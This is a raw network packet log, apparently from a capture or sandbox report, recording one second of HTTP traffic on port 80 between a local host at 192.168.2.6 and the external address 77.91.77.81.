Jul 3, 2024 18:09:05.724522114 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724533081 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724549055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724576950 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724596024 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724683046 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724699020 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724714041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724728107 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724730015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724745035 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.724756956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724772930 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.724798918 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725133896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725179911 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725179911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725197077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725222111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725234032 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725281954 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725296974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725312948 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725326061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725344896 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725356102 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725589991 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725635052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725646019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725661993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725689888 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725701094 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725761890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725779057 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725795031 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725807905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725811958 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.725830078 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725842953 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.725851059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726232052 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726280928 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726294041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726310015 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726339102 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726351023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726435900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726452112 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726466894 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726478100 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726484060 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726492882 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726512909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726524115 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726602077 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726625919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726650000 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726658106 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.726675034 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.726695061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727113008 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727155924 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727217913 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727233887 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727261066 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727273941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727351904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727368116 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727384090 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727396011 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727401018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.727411985 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727426052 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.727442026 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781128883 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781183004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781200886 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781208992 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781228065 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781236887 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781291962 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781307936 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781322956 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781332970 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781338930 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781349897 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781373978 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781500101 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781544924 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.781729937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.781774998 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.815028906 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.815058947 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.815073967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.815094948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.815135956 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.815136909 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850517988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850536108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850552082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850611925 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850646019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850661993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850678921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850694895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850785017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850785017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850785017 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850826979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850842953 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850858927 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850872040 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.850877047 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850893974 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.850922108 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851088047 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851111889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851128101 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851130009 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851147890 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851156950 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851166964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851195097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851242065 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851258039 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851272106 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851288080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851294041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851309061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851320982 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851341963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851368904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851418018 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851464033 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851479053 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851506948 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851520061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851588964 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851603985 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851625919 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851632118 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851641893 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851694107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851694107 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851716995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851723909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851767063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851799965 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851824045 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851840019 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851845980 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851857901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.851867914 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851887941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.851902008 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852298975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852324009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852339029 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852340937 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852364063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852375984 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852488041 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852503061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852518082 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852531910 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852535009 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852550983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852561951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852583885 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852714062 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852737904 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852752924 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852760077 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852768898 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852768898 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852788925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852792978 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852807999 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852818966 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.852869034 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.852912903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853439093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853454113 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853476048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853487015 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853499889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853502989 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853516102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853519917 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853533983 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853539944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853549957 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853553057 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853571892 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853585958 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853828907 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853844881 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853859901 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853873968 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853877068 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853890896 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853893042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853902102 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853912115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.853925943 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853935957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.853956938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.854255915 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.854281902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.854298115 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.854305983 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.854326010 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.854336023 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.854407072 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.854423046 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.854451895 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.854465008 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.871818066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.871874094 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.871882915 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.871890068 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.871920109 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.871933937 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872023106 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872039080 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872054100 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872068882 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872071981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872087002 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872093916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872128963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872275114 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872291088 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872306108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872322083 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.872324944 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872350931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.872375965 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.905885935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906013966 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906023979 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906054974 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906065941 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906073093 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906089067 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906094074 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906105995 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906114101 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906132936 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906125069 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906148911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906187057 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.906213045 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.906229973 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941267967 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941294909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941312075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941353083 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941479921 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941495895 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941519022 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941534996 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941577911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941579103 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941579103 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941620111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941620111 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941639900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941672087 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941688061 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941694021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941704988 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941711903 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941723108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941729069 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941740036 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941747904 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941756964 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941778898 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.941947937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941968918 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.941994905 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.942008018 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.942012072 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.942051888 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976564884 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976640940 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976655006 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976661921 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976671934 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976682901 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976690054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976701021 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976706982 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976716995 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976723909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976733923 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976751089 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976772070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976887941 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976916075 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.976938963 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.976954937 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977046013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977061987 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977077007 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977092981 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977108955 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977114916 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977130890 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977147102 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977153063 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977163076 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977175951 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977180004 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977195978 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977224112 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977252007 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977304935 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977310896 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977327108 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977355957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977370977 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977402925 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977421999 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977436066 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977452993 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977459908 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977482080 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977514029 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:05.977524042 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977561951 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:05.977567911 CEST	62923	80	192.168.2.6	77.91.77.81
